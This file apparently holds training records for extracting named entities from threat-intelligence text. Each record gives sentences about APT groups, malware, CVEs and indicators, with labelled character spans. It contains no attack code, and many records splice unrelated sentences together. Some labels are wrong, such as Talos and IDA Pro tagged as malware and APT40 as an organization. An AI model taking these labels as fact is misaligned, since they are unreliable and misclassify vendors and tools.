"cyberner_stix_train"}}
{"text": "These analysts were linked by their coverage of the telecommunications industry , making this targeting very similar to , and likely a continuation of , activity described in our “ In Pursuit of Optical Fibers and Troop Intel ” blog .", "spans": {}, "info": {"id": "cyberner_stix_train_002797", "source": "cyberner_stix_train"}}
{"text": "We have observed the Enfal malware in use since 2011 and in conjunction with Backdoor.APT.Pgift as the payload of a malicious document used in spearphishing attacks . The group 's capabilities are more than the much discussed CVE-2012-0158 exploits over the past few years .", "spans": {"TOOL: Enfal malware": [[21, 34]], "MALWARE: Backdoor.APT.Pgift": [[77, 95]], "VULNERABILITY: CVE-2012-0158": [[226, 239]]}, "info": {"id": "cyberner_stix_train_002798", "source": "cyberner_stix_train"}}
{"text": "The initial dropper has a weaponized Feng Shui Bundle as encrypted asset files . Threat actors may use the date string hardcoded into each Bookworm sample as a build identifier . A little over a year ago , in October 2018 , our polymorphic outbreak monitoring system detected a large surge in reports , indicating that a large-scale campaign was unfolding . Additional Email Delegate Permissions APT29 has used a compromised global administrator account in Azure AD to backdoor a service principal with ApplicationImpersonation rights to start collecting emails from targeted mailboxe .", "spans": {"MALWARE: date string hardcoded": [[107, 128]], "TOOL: Bookworm sample": [[139, 154]], "THREAT_ACTOR: APT29": [[396, 401]]}, "info": {"id": "cyberner_stix_train_002799", "source": "cyberner_stix_train"}}
{"text": "In the past , the Sofacy developers modified earlier AZZY backdoors to use a C&C server encoded in the registry , instead of storing it in the malware itself , so this code modularisation follows the same line of thinking .", "spans": {"THREAT_ACTOR: Sofacy": [[18, 24]], "MALWARE: AZZY backdoors": [[53, 67]], "TOOL: C&C": [[77, 80]]}, "info": {"id": "cyberner_stix_train_002801", "source": "cyberner_stix_train"}}
{"text": "As we know from the FTP dump analysis , there was a firmware component from ASUS firmware , indicating the attacker ’ s interest in ASUS devices , which explains the victim file name that mentions “ ASUS ” . HIDDEN COBRA actors install the FALLCHILL malware to establish persistence . Quasar RAT was installed to CSIDL_PROFILE\\appdata\\roaming\\microsoft\\crypto\\smss.exe . Sometimes this was a high profile , legitimate site such as ‘ diplomacy.pl ’ hosting a ZIP archive .", "spans": {"ORGANIZATION: ASUS": [[76, 80], [132, 136]], "THREAT_ACTOR: HIDDEN COBRA actors": [[208, 227]], "TOOL: FALLCHILL malware": [[240, 257]], "MALWARE: Quasar RAT": [[285, 295]], "FILEPATH: CSIDL_PROFILE\\appdata\\roaming\\microsoft\\crypto\\smss.exe": [[313, 368]]}, "info": {"id": "cyberner_stix_train_002802", "source": "cyberner_stix_train"}}
{"text": "This attack , however , seems exclusive to Android users , as it does not have the code to attack iOS devices . APT17 , also known as DeputyDog , is a China-based threat group that FireEye Intelligence has observed conducting network intrusions against U.S. government entities , the defense industry , law firms , information technology companies , mining companies , and non-government organizations . After the file is written, the malware moves on to process operations . There is evidence to suggest that in 2010 Harrison was directed to harass the owner of Ashleymadisonsucks.com into closing the site or selling the domain to Ashley Madison .", "spans": {"SYSTEM: Android": [[43, 50]], "SYSTEM: iOS": [[98, 101]], "THREAT_ACTOR: APT17": [[112, 117]], "THREAT_ACTOR: DeputyDog": [[134, 143]], "THREAT_ACTOR: threat group": [[163, 175]], "ORGANIZATION: FireEye Intelligence": [[181, 201]], "ORGANIZATION: government entities": [[258, 277]], "ORGANIZATION: defense industry": [[284, 300]], "ORGANIZATION: law firms": [[303, 312]], "ORGANIZATION: information technology companies": [[315, 347]], "ORGANIZATION: mining companies": [[350, 366]], "ORGANIZATION: non-government organizations": [[373, 401]], "ORGANIZATION: Harrison": [[518, 526]], "ORGANIZATION: Ashleymadisonsucks.com": [[563, 585]], "ORGANIZATION: Ashley Madison": [[633, 647]]}, "info": {"id": "cyberner_stix_train_002803", "source": "cyberner_stix_train"}}
{"text": "Note there is a typo in the executable ’s filename ; Once the binary is executed , a password prompt dialog box opens .", "spans": {}, "info": {"id": "cyberner_stix_train_002804", "source": "cyberner_stix_train"}}
{"text": "ALLCONTACTS – send all contacts from phone memory to C & C . Attackers have been known to distribute malicious files masquerading as the legitimate iviewers.dll file and then use DLL load hijacking to execute the malicious code and infect the computer . This included the Fuzzbunch framework that was part of an infamous leak of exploits and tools by the Shadow Brokers in April 2017 .", "spans": {"MALWARE: malicious files": [[101, 116]], "TOOL: iviewers.dll file": [[148, 165]], "TOOL: DLL load hijacking": [[179, 197]], "MALWARE: Fuzzbunch": [[272, 281]], "THREAT_ACTOR: Shadow Brokers": [[355, 369]]}, "info": {"id": "cyberner_stix_train_002805", "source": "cyberner_stix_train"}}
{"text": "The code for this characteristic and the corresponding Twitter accounts can be seen in figures 3 and 4 respectively . A China-based cyber threat group , which FireEye tracks as an uncategorized advanced persistent threat ( APT ) group and other researchers refer to as admin@338 , may have conducted the activity . Table 5: Glimpse action parameters values for the AdrGen function below contains the possible parameters, a brief description, and return values applicable to the action . Adversaries may manipulate physical process control within the industrial environment .", "spans": {"ORGANIZATION: Twitter": [[55, 62]], "THREAT_ACTOR: cyber threat group": [[132, 150]], "ORGANIZATION: FireEye": [[159, 166]], "THREAT_ACTOR: threat": [[214, 220]], "THREAT_ACTOR: admin@338": [[269, 278]], "MALWARE: Glimpse": [[324, 331]]}, "info": {"id": "cyberner_stix_train_002806", "source": "cyberner_stix_train"}}
{"text": "The c2 domain was associated with multiple IP addresses in past .", "spans": {"TOOL: c2": [[4, 6]]}, "info": {"id": "cyberner_stix_train_002807", "source": "cyberner_stix_train"}}
{"text": "Although the campaign identifier itself doesn’t contain a date , we believe the campaign to have originated around the 7th of June 2009 , which was when the PinchDuke sample in question was compiled .", "spans": {"MALWARE: PinchDuke": [[157, 166]]}, "info": {"id": "cyberner_stix_train_002808", "source": "cyberner_stix_train"}}
{"text": "The Ham Backdoor functions primarily as a modular platform , which provides the attacker with the ability to directly download additional modules and execute them in memory from the command and control ( C2 ) server . While OceanLotus’ targets are global , their operations are mostly active within the APAC region which encompasses targeting private sectors across multiple industries , foreign governments , activists , and dissidents connected to Vietnam .", "spans": {"TOOL: Ham Backdoor": [[4, 16]], "THREAT_ACTOR: OceanLotus’": [[224, 235]], "ORGANIZATION: foreign governments": [[388, 407]], "ORGANIZATION: activists": [[410, 419]], "ORGANIZATION: dissidents": [[426, 436]]}, "info": {"id": "cyberner_stix_train_002809", "source": "cyberner_stix_train"}}
{"text": "Key : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\AudioMgr Value : %AppData%\\Video\\videodrv.exe .", "spans": {"FILEPATH: %AppData%\\Video\\videodrv.exe": [[74, 102]]}, "info": {"id": "cyberner_stix_train_002810", "source": "cyberner_stix_train"}}
{"text": "We also found the actor ’s Telegram group on their fake website .", "spans": {"TOOL: Telegram": [[27, 35]]}, "info": {"id": "cyberner_stix_train_002811", "source": "cyberner_stix_train"}}
{"text": "In this example , the requests to the server take the following form : Here , the “ operator ” query parameter is the Mobile Country Code and Mobile Network Code . Barium specializes in targeting high value organizations holding sensitive data , by gathering extensive information about their employees through publicly available information and social media , using that information to fashion phishing attacks intended to trickthose employees into compromising their computers and networks . If the type of the object that the system is trying to validate is a process , the hook code rewrites again the configuration data of the ZxShell service in the windows registry . “ s1.txt ” , which likely contains the unauthorized MicroSCADA commands", "spans": {"ORGANIZATION: employees": [[293, 302], [435, 444]], "ORGANIZATION: social media": [[346, 358]], "MALWARE: ZxShell": [[632, 639]], "SYSTEM: windows": [[655, 662]]}, "info": {"id": "cyberner_stix_train_002812", "source": "cyberner_stix_train"}}
{"text": "Conclusion Although not yet mature enough to provide the equivalent of a full-blown set of Android banking malware features ( such as RAT , RAT with ATS ( Automated Transaction Script ) , back-connect proxy , media streaming ) , or providing an exhaustive target list , Cerberus should not be taken lightly . In June 2019 , continuous SectorJ04's activities targeting South Korea were found again and spam emails were written with various contents , including transaction statements , receipts and remittance cards . BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks .", "spans": {"SYSTEM: Android": [[91, 98]], "MALWARE: Cerberus": [[270, 278]], "THREAT_ACTOR: SectorJ04's": [[335, 346]], "THREAT_ACTOR: BRONZE BUTLER": [[517, 530]], "TOOL: emails": [[549, 555]], "TOOL: Flash": [[561, 566], [653, 658]], "MALWARE: Daserf": [[613, 619]], "MALWARE: malware": [[620, 627]], "VULNERABILITY: exploits": [[659, 667]]}, "info": {"id": "cyberner_stix_train_002813", "source": "cyberner_stix_train"}}
{"text": "We speculate that this is an intermediate stage in significant changes to their macOS malware .", "spans": {"SYSTEM: macOS": [[80, 85]]}, "info": {"id": "cyberner_stix_train_002814", "source": "cyberner_stix_train"}}
{"text": "The Shellbot disguises itself as a process named rsync , commonly the binary seen on many Unix- and Linux-based systems to automatically run for backup and synchronization .", "spans": {"MALWARE: Shellbot": [[4, 12]], "SYSTEM: Unix-": [[90, 95]], "SYSTEM: Linux-based": [[100, 111]]}, "info": {"id": "cyberner_stix_train_002815", "source": "cyberner_stix_train"}}
{"text": "At this stage , the analysis can only continue by manually investigating the individual code blocks and opcode handlers , which are highly obfuscated ( also using spaghetti code ) . One of the most interesting observations made during this analysis is that the amount of development effort devoted to Emissary significantly increased after we published our Operation Lotus Blossom report in June 2015 , resulting in many new versions of the Emissary Trojan . So , we put our trust in software vendors that the files they distribute don’t include malware . CrowdStrike researchers replicated the exploit method attack on Exchange systems that had not received the November 8 , 2022 patch KB5019758 , but could not replicate the attack on systems that had received that patch .", "spans": {"TOOL: Emissary": [[301, 309]], "TOOL: Emissary Trojan": [[441, 456]], "ORGANIZATION: CrowdStrike researchers": [[556, 579]], "ORGANIZATION: Exchange systems": [[620, 636]]}, "info": {"id": "cyberner_stix_train_002816", "source": "cyberner_stix_train"}}
{"text": "In the latest implant versions there are 48 different commands . The NewsBeef campaign is divided into two main attack vectors , spearphishing and strategic web compromise watering hole attacks . MuddyWater : Seedworm , TEMP.Zagros .", "spans": {"THREAT_ACTOR: NewsBeef": [[69, 77]], "THREAT_ACTOR: MuddyWater": [[196, 206]], "THREAT_ACTOR: Seedworm": [[209, 217]], "THREAT_ACTOR: TEMP.Zagros": [[220, 231]]}, "info": {"id": "cyberner_stix_train_002817", "source": "cyberner_stix_train"}}
{"text": "These attacks , which occurred in November 2016 and January 2017 , reportedly affected thousands of computers across multiple government and civil organizations in Saudi Arabia and elsewhere in Gulf states .", "spans": {}, "info": {"id": "cyberner_stix_train_002818", "source": "cyberner_stix_train"}}
{"text": "The previous documents that used this user name were macro-laden delivery documents that installed SofacyCarberp S-MAL/Seduploader payloads , as discussed in Talos ’ blog .", "spans": {"MALWARE: SofacyCarberp S-MAL/Seduploader": [[99, 130]]}, "info": {"id": "cyberner_stix_train_002819", "source": "cyberner_stix_train"}}
{"text": "If remote access between zones is an unavoidable business need , log and monitor these connections closely .", "spans": {}, "info": {"id": "cyberner_stix_train_002820", "source": "cyberner_stix_train"}}
{"text": "Even stranger , each webpage contained the same content within the body .", "spans": {}, "info": {"id": "cyberner_stix_train_002821", "source": "cyberner_stix_train"}}
{"text": "] today www [ . Myanmar has been the target of Mofang 's attacks for years before the campaign related to the sez . These subtle changes may be enough to circumvent existing IDS signatures designed to detect older variants of the Aumlib family . We recommend following Microsoft ’s guidance and patching Exchange Server immediately to mitigate this activity .", "spans": {"THREAT_ACTOR: Mofang": [[47, 53]], "MALWARE: Aumlib": [[230, 236]]}, "info": {"id": "cyberner_stix_train_002822", "source": "cyberner_stix_train"}}
{"text": "As a result , information related to the malicious actor is tentatively redacted in this publication . We speculate that other attacks delivering Bookworm were also targeting organizations in Thailand based on the contents of the associated decoys documents , as well as several of the dynamic DNS domain names used to host C2 servers that contain the words \" Thai \" or \" Thailand \" . A cursory review of BlackOasis ’ espionage campaign suggests there is some overlap between the group ’s actions and Saudi Arabia ’s geopolitical interests . [ 42 ] TYPEFRAME has used ports 443 , 8080 , and 8443 with a FakeTLS method .", "spans": {"TOOL: Bookworm": [[146, 154]], "MALWARE: decoys documents": [[241, 257]], "TOOL: dynamic DNS domain": [[286, 304]], "THREAT_ACTOR: BlackOasis": [[405, 415]], "MALWARE: TYPEFRAME": [[549, 558]]}, "info": {"id": "cyberner_stix_train_002823", "source": "cyberner_stix_train"}}
{"text": "Again , if a victim downloaded a torrent containing a wrapped executable , they would get infected with OnionDuke .", "spans": {"MALWARE: OnionDuke": [[104, 113]]}, "info": {"id": "cyberner_stix_train_002824", "source": "cyberner_stix_train"}}
{"text": "For TA505 , the payloads have shifted over the years and months of their activity , but their sending and hosting infrastructure make these changes relatively simple to implement .", "spans": {"THREAT_ACTOR: TA505": [[4, 9]]}, "info": {"id": "cyberner_stix_train_002825", "source": "cyberner_stix_train"}}
{"text": "Lookout researchers have been tracking this threat for the last month . Like previous Turla activity , WhiteBear leverages compromised websites and hijacked satellite connections for command and control ( C2 ) infrastructure . Svchost.exe groups are identified in the above registry key . Fortunately , an artifact of its execution was discovered in the /private / var / db / oah directory .", "spans": {"ORGANIZATION: Lookout": [[0, 7]], "TOOL: WhiteBear": [[103, 112]], "FILEPATH: Svchost.exe": [[227, 238]]}, "info": {"id": "cyberner_stix_train_002826", "source": "cyberner_stix_train"}}
{"text": "The Command & Control server also displays a favicon image which looks like a small orange ball . Suckfly targeted one of India 's largest e-commerce companies , a major Indian shipping company , one of India 's largest financial organizations , and an IT firm that provides support for India 's largest stock exchange . While it is unknown at this point whether the backdoor was coded by the same members of the group behind the attacks , there are indications that suggest that the malware was authored by Ukranian-speaking malware developers . The network sees a high number of data access and transfer requests by the same user , who may be authorized , but does not regularly work with the targeted data assets and network resources .", "spans": {"ORGANIZATION: e-commerce companies": [[139, 159]], "ORGANIZATION: shipping company": [[177, 193]], "ORGANIZATION: financial organizations": [[220, 243]], "ORGANIZATION: IT firm": [[253, 260]], "MALWARE: backdoor": [[367, 375]]}, "info": {"id": "cyberner_stix_train_002827", "source": "cyberner_stix_train"}}
{"text": "However , the apps are still available in third-party app stores . FireEye defined APT40 as the Chinese state-sponsored threat actor previously reported as TEMP.Periscope , Leviathan and TEMP.Jumper . This version of KONNI is the most advanced with better coding .", "spans": {"ORGANIZATION: FireEye": [[67, 74]], "ORGANIZATION: APT40": [[83, 88]], "THREAT_ACTOR: TEMP.Periscope": [[156, 170]], "THREAT_ACTOR: Leviathan": [[173, 182]], "THREAT_ACTOR: TEMP.Jumper": [[187, 198]], "MALWARE: KONNI": [[217, 222]]}, "info": {"id": "cyberner_stix_train_002828", "source": "cyberner_stix_train"}}
{"text": "Desktop Trojans and Their Mobile Component The process by which Trojans attempt to infect mobile devices is at least a decade old . The China Chopper actor activity starts with the download and execution of two exploit files which attempt to exploit the Windows vulnerabilities CVE-2015-0062 , CVE-2015-1701 and CVE-2016-0099 to allow the attacker to modify other objects on the server . APT34 uses a mix of public and non-public tools , often conducting spear phishing operations using compromised accounts from trusted third parties , sometimes coupled with social engineering tactics .", "spans": {"MALWARE: China Chopper": [[136, 149]], "VULNERABILITY: CVE-2015-0062": [[278, 291]], "VULNERABILITY: CVE-2015-1701": [[294, 307]], "VULNERABILITY: CVE-2016-0099": [[312, 325]], "THREAT_ACTOR: attacker": [[339, 347]], "THREAT_ACTOR: APT34": [[388, 393]], "MALWARE: public and non-public tools": [[408, 435]], "MALWARE: compromised accounts": [[487, 507]]}, "info": {"id": "cyberner_stix_train_002829", "source": "cyberner_stix_train"}}
{"text": "The data that is sent in the POST is serialized with json , which is then is encrypted , and finally encoded in base64 .", "spans": {"TOOL: json": [[53, 57]]}, "info": {"id": "cyberner_stix_train_002830", "source": "cyberner_stix_train"}}
{"text": "The loader and the SofacyCarberp sample delivered in this attack is similar to samples we have analyzed in the past but contains marked differences .", "spans": {"MALWARE: SofacyCarberp": [[19, 32]]}, "info": {"id": "cyberner_stix_train_002831", "source": "cyberner_stix_train"}}
{"text": "Although Talos analyzed the unpacked version of the code , the packer analysis is beyond the scope of this post . However , FireEye researchers do not have enough insight to reliably report a definitive connection to the Moafee and DragonOK groups . Also , you may check MAC addresses online . StrifeWater is used to create a foothold in victim and environments , and it has various functions , including executing system commands , screen capturing , establishing persistence , listing system files , and downloading updates and additional modules .", "spans": {"MALWARE: Talos": [[9, 14]], "ORGANIZATION: FireEye": [[124, 131]], "THREAT_ACTOR: Moafee": [[221, 227]], "THREAT_ACTOR: DragonOK groups": [[232, 247]], "MALWARE: StrifeWater": [[294, 305]]}, "info": {"id": "cyberner_stix_train_002832", "source": "cyberner_stix_train"}}
{"text": "” some_method ” , “ data ” :", "spans": {}, "info": {"id": "cyberner_stix_train_002833", "source": "cyberner_stix_train"}}
{"text": "Figure 7 lists the IP addresses of these C2 servers , the number of RuMMS apps that connect to each of them , and the example URL used as the first parameter of the HttpPost operation ( used in the code of Figure 3 ) . The attacks delivered a PowerShell backdoor called QUADAGENT , a tool attributed to the OilRig group by both ClearSky Cyber Security and FireEye . The attacker implemented filtering based on the keyboard 's layout . We 'll delve into the recent four - month spike in attacks against the UK , the unsettling uptick in attacks on France 's government sector , and how Germany retained its spot as the fourth most targeted country in the world .", "spans": {"MALWARE: RuMMS": [[68, 73]], "TOOL: PowerShell backdoor": [[243, 262]], "TOOL: QUADAGENT": [[270, 279]], "THREAT_ACTOR: OilRig group": [[307, 319]], "ORGANIZATION: ClearSky Cyber Security": [[328, 351]], "ORGANIZATION: FireEye": [[356, 363]], "ORGANIZATION: UK": [[506, 508]], "ORGANIZATION: France 's government sector": [[547, 574]], "ORGANIZATION: Germany": [[585, 592]]}, "info": {"id": "cyberner_stix_train_002834", "source": "cyberner_stix_train"}}
{"text": "The said screen is the ransom note , which contains threats and instructions to pay the ransom . Starting in mid-February . . The file path at the end of the configuration is used to store configuration data that is encrypted using AES-128 .", "spans": {}, "info": {"id": "cyberner_stix_train_002835", "source": "cyberner_stix_train"}}
{"text": "DEFENSOR ID was released on Feb 3 , 2020 and last updated to v1.4 on May 6 , 2020 . The SLUB malware was delivered through watering hole websites that were injected with exploits for CVE-2018-8174 or CVE-2019-0752 . Furthermore , like many other identified Lazarus Group families , these tools showcase the group 's creative solutions , such as the PapaAlfa , which makes it difficult to immediately identify potentially malicious activity on a compromised network .", "spans": {"MALWARE: DEFENSOR ID": [[0, 11]], "THREAT_ACTOR: SLUB": [[88, 92]], "VULNERABILITY: CVE-2018-8174": [[183, 196]], "VULNERABILITY: CVE-2019-0752": [[200, 213]], "THREAT_ACTOR: Lazarus Group": [[257, 270]], "MALWARE: PapaAlfa": [[349, 357]]}, "info": {"id": "cyberner_stix_train_002836", "source": "cyberner_stix_train"}}
{"text": "This technique only works for unpatched devices running Android 4.3 or lower . Based on Kaspersky Lab 's analysis of NetTraveler 's C&C data , there were a total of 350 victims in 40 countries across including the United States , Canada , United Kingdom , Russia , Chile , Morocco , Greece , Belgium , Austria , Ukraine , Lithuania , Belarus , Australia , Hong Kong , Japan , China , Mongolia , Iran , Turkey , India , Pakistan , South Korea , Thailand , Qatar , Kazakhstan , and Jordan . One of the media organizations involved in this latest activity was targeted in June 2015 , while its Hong Kong branch was similarly targeted in August 2015 . ( Forbes , Gizmodo ) • Vulnerability Roundup : Memory corruption vulnerability in Microsoft Edge ; MilesightVPN and router could be taken over • Malicious Microsoft Drivers Could Number in the Thousands : Cisco Talos • New Threat Actor Launches Cyber - attacks on Ukraine and Poland •", "spans": {"SYSTEM: Android 4.3": [[56, 67]], "ORGANIZATION: Kaspersky Lab": [[88, 101]], "ORGANIZATION: Forbes": [[650, 656]], "ORGANIZATION: Gizmodo": [[659, 666]], "VULNERABILITY: Memory corruption vulnerability": [[695, 726]], "TOOL: Microsoft Edge": [[730, 744]], "SYSTEM: MilesightVPN": [[747, 759]], "TOOL: Malicious Microsoft Drivers": [[793, 820]], "ORGANIZATION: Cisco Talos": [[853, 864]], "THREAT_ACTOR: Cyber - attacks": [[893, 908]]}, "info": {"id": "cyberner_stix_train_002837", "source": "cyberner_stix_train"}}
{"text": "Proofpoint wrote about the DroidJack RAT side-loaded with the Pokemon GO app back in July 2016 ; the difference here is that there is no game included in the malicious package . The admin@338 has targeted international media organizations in the past . Ironically , Ben-Gurion University is home to Israel ’s Cyber Security Research Center . So , if you get a bunch of messages from strangers , do n't click on the links , and do n’t click on any attachments .", "spans": {"ORGANIZATION: Proofpoint": [[0, 10]], "MALWARE: DroidJack RAT": [[27, 40]], "SYSTEM: Pokemon GO": [[62, 72]], "THREAT_ACTOR: admin@338": [[182, 191]], "ORGANIZATION: international media organizations": [[205, 238]], "ORGANIZATION: Ben-Gurion University": [[266, 287]], "ORGANIZATION: Israel ’s Cyber Security Research Center": [[299, 339]]}, "info": {"id": "cyberner_stix_train_002838", "source": "cyberner_stix_train"}}
{"text": "As for the Ashas family , one of the associated promotional videos , “ Head Soccer World Champion 2018 – Android , ios ” was viewed almost three million times and two others reached hundreds of thousands of views , as seen in Figure 11 . Attaching with IDA Pro via WinDbg as in Figure 11 shows that the program counter points to the infinite loop written in memory allocated by flare-qdb . Filename: Anti virus service.lnk . dowhelsitjs.netau.net .", "spans": {"MALWARE: Ashas": [[11, 16]], "SYSTEM: Android": [[105, 112]], "SYSTEM: ios": [[115, 118]], "MALWARE: IDA Pro": [[253, 260]], "MALWARE: WinDbg": [[265, 271]], "FILEPATH: Anti virus service.lnk": [[400, 422]], "DOMAIN: dowhelsitjs.netau.net": [[425, 446]]}, "info": {"id": "cyberner_stix_train_002839", "source": "cyberner_stix_train"}}
{"text": "Credentials targeted by PinchDuke include ones associated with the following software or services : The Bat! , Yahoo! , Mail.ru , Passport.Net , Google Talk , Netscape Navigator , Mozilla Firefox , Mozilla Thunderbird , Internet Explorer , Microsoft Outlook , WinInet Credential Cache , Lightweight Directory Access Protocol ( LDAP ) .", "spans": {"MALWARE: PinchDuke": [[24, 33]], "TOOL: Bat!": [[104, 108]], "TOOL: Yahoo!": [[111, 117]], "DOMAIN: Mail.ru": [[120, 127]], "DOMAIN: Passport.Net": [[130, 142]], "TOOL: Google Talk": [[145, 156]], "TOOL: Netscape Navigator": [[159, 177]], "TOOL: Mozilla Firefox": [[180, 195]], "TOOL: Mozilla Thunderbird": [[198, 217]], "TOOL: Internet Explorer": [[220, 237]], "ORGANIZATION: Microsoft": [[240, 249]], "TOOL: Outlook": [[250, 257]], "TOOL: WinInet Credential Cache": [[260, 284]], "TOOL: Lightweight Directory Access Protocol": [[287, 324]], "TOOL: LDAP": [[327, 331]]}, "info": {"id": "cyberner_stix_train_002841", "source": "cyberner_stix_train"}}
{"text": "This second group is an Arabic-speaking group that mainly targets the Middle East and North Africa , with a few targets in European and Asian countries as well .", "spans": {}, "info": {"id": "cyberner_stix_train_002842", "source": "cyberner_stix_train"}}
{"text": "The cdnver.dll payload installed by the loader executable is a variant of the SofacyCarberp payload , which is used extensively by the Sofacy threat group .", "spans": {"FILEPATH: cdnver.dll": [[4, 14]], "MALWARE: SofacyCarberp": [[78, 91]], "THREAT_ACTOR: Sofacy": [[135, 141]]}, "info": {"id": "cyberner_stix_train_002843", "source": "cyberner_stix_train"}}
{"text": "saved on the device — “ 12 ” and “ 13 ” Use the accessibility service to become the default SMS app — “ 6 ” Enable recording of other apps — “ 15 ” Kill switch — “ 4 ” The Lockdown Screen Most thieves don ’ t want to be caught red-handed as they steal — they want to buy some time to get away with the loot . However , CTU analysis indicates that GOLD LOWELL is motivated by financial gain , and there is no evidence of the threat actors using network access for espionage or data theft . ASERT has learned of an APT campaign , possibly originating from DPRK , we are calling STOLEN PENCIL that is targeting academic institutions since at least May 2018 .", "spans": {"ORGANIZATION: CTU": [[319, 322]], "THREAT_ACTOR: GOLD LOWELL": [[347, 358]], "ORGANIZATION: ASERT": [[489, 494]], "ORGANIZATION: academic institutions": [[608, 629]]}, "info": {"id": "cyberner_stix_train_002844", "source": "cyberner_stix_train"}}
{"text": "This vulnerability was disclosed and patched days prior to this attack .", "spans": {}, "info": {"id": "cyberner_stix_train_002845", "source": "cyberner_stix_train"}}
{"text": "The malware is not really advanced and is based on a lot of copy/paste from public sources available on the Internet . In some other cases , LEAD gains access to a target by brute-forcing remote access login credentials , performing SQL injection , or exploiting unpatched web servers , and then they copy the Winnti installer directly to compromised machines . Trend Micro generally notifies customers that are believed to have been specifically targeted by APT campaigns . 2023 - 07 - 19 Update : On June 5 , @SecurityAura described an unknown campaign using .hta payloads disguised as driver updates .", "spans": {"TOOL: Winnti installer": [[310, 326]], "ORGANIZATION: Trend Micro": [[362, 373]], "ORGANIZATION: @SecurityAura": [[511, 524]]}, "info": {"id": "cyberner_stix_train_002846", "source": "cyberner_stix_train"}}
{"text": "Instead , we believe that they are simply expanding their activities by adding new tools and techniques .", "spans": {}, "info": {"id": "cyberner_stix_train_002847", "source": "cyberner_stix_train"}}
{"text": "APT33 often conducts spear-phishing operations using a built-in phishing module . We were not able to unpack the sample discovered after June 9 , 2017 .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]]}, "info": {"id": "cyberner_stix_train_002848", "source": "cyberner_stix_train"}}
{"text": "If the returned JSON object has the “ 4 ” key , it will turn on the kill switch and initiate its own removal by sending an intent and seamlessly confirming the uninstall using the accessibility service , all without the victim ever noticing anything . We assess the targeting of multiple companies with aviation-related partnerships to Saudi Arabia indicates that APT33 may possibly be looking to gain insights on Saudi Arabia 's military aviation capabilities to enhance Iran 's domestic aviation capabilities or to support Iran 's military and strategic decision making vis a vis Saudi Arabia . In late 2015 , Symantec identified suspicious activity involving a hacking tool used in a malicious manner against one of our customers .", "spans": {"THREAT_ACTOR: APT33": [[364, 369]], "ORGANIZATION: military": [[533, 541]], "ORGANIZATION: Symantec": [[612, 620]], "ORGANIZATION: customers": [[723, 732]]}, "info": {"id": "cyberner_stix_train_002849", "source": "cyberner_stix_train"}}
{"text": "Learning to access video game production environments enabled APT41 to develop the tactics , techniques , and procedures (TTPs) that were later leveraged against software companies to inject malicious code into software updates . Other open source and semi-legitimate pen-testing tools like nbtscan and powercat are being used for mapping available resources and lateral movement as well .", "spans": {"THREAT_ACTOR: APT41": [[62, 67]], "FILEPATH: nbtscan": [[291, 298]], "FILEPATH: powercat": [[303, 311]]}, "info": {"id": "cyberner_stix_train_002850", "source": "cyberner_stix_train"}}
{"text": "Although the command and control domain was different from those in the report , the POST and GET requests were similar and included / dad5 / in the URL string .", "spans": {}, "info": {"id": "cyberner_stix_train_002851", "source": "cyberner_stix_train"}}
{"text": "The Ke3chang have used three types of malware over the years and have traditionally targeted the aerospace , energy , government , high-tech , consulting services , chemicals , manufacturing , mining sectors . Amongst a backdrop of other incidents , Infy became one of the most frequently observed agents for attempted malware attacks against Iranian civil society beginning in late 2014 , growing in use up to the February 2016 parliamentary election in Iran .", "spans": {"THREAT_ACTOR: Ke3chang": [[4, 12]], "ORGANIZATION: aerospace": [[97, 106]], "ORGANIZATION: energy": [[109, 115]], "ORGANIZATION: government": [[118, 128]], "ORGANIZATION: high-tech": [[131, 140]], "ORGANIZATION: consulting services": [[143, 162]], "ORGANIZATION: chemicals": [[165, 174]], "ORGANIZATION: manufacturing": [[177, 190]], "ORGANIZATION: mining sectors": [[193, 207]], "ORGANIZATION: civil society": [[351, 364]]}, "info": {"id": "cyberner_stix_train_002852", "source": "cyberner_stix_train"}}
{"text": "If not , the application downloads a pack of exploits from the server and runs them one-by-one up until root is achieved . Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . Operating since 2012 , the Molerats group 's activity has been reported by Norman , Kaspersky , FireEye , and PwC .", "spans": {"MALWARE: slides": [[156, 162]], "VULNERABILITY: CVE-2017-8759": [[187, 200]], "TOOL: Microsoft .NET framework": [[244, 268]], "THREAT_ACTOR: Molerats group": [[298, 312]], "ORGANIZATION: Norman": [[346, 352]], "ORGANIZATION: Kaspersky": [[355, 364]], "ORGANIZATION: FireEye": [[367, 374]], "ORGANIZATION: PwC": [[381, 384]]}, "info": {"id": "cyberner_stix_train_002853", "source": "cyberner_stix_train"}}
{"text": "Overall , it has a fairly common feature list , but it is expected to expand in future updates . In all three incidents , APT10 actors used previously acquired legitimate credentials , possibly gained via a third-party supply chain compromise in order to gain initial access to the law firm and the apparel company . Therefore , Tick or their digital quartermaster is capable of deploying new and unique exploits .", "spans": {"THREAT_ACTOR: APT10": [[122, 127]], "ORGANIZATION: law firm": [[282, 290]], "ORGANIZATION: apparel company": [[299, 314]], "THREAT_ACTOR: Tick": [[329, 333]]}, "info": {"id": "cyberner_stix_train_002854", "source": "cyberner_stix_train"}}
{"text": "Check if the computer name and user name , or external IP address , is in a provided list and if so , display a message box with a message as defined by the C2 .", "spans": {"TOOL: C2": [[157, 159]]}, "info": {"id": "cyberner_stix_train_002855", "source": "cyberner_stix_train"}}
{"text": "The export called “ SendDataToServer_2 ” does exactly what the name means : it encrypts all collected data , encodes it using Base64 encoding and calls its additional library to send the data to the C2 server .", "spans": {"TOOL: C2": [[199, 201]]}, "info": {"id": "cyberner_stix_train_002856", "source": "cyberner_stix_train"}}
{"text": "After iterating over the 171 samples , we ’re left with this list of hashes for the downloaded files .", "spans": {}, "info": {"id": "cyberner_stix_train_002857", "source": "cyberner_stix_train"}}
{"text": "Most recently , Animal Farm deployed the Casper Trojan via a watering-hole attack in Syria . We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers .", "spans": {"THREAT_ACTOR: Animal Farm": [[16, 27]], "TOOL: Casper Trojan": [[41, 54]], "MALWARE: Carbanak": [[113, 121]], "THREAT_ACTOR: criminals": [[188, 197]], "ORGANIZATION: financial industry": [[238, 256]], "ORGANIZATION: customers": [[280, 289]]}, "info": {"id": "cyberner_stix_train_002858", "source": "cyberner_stix_train"}}
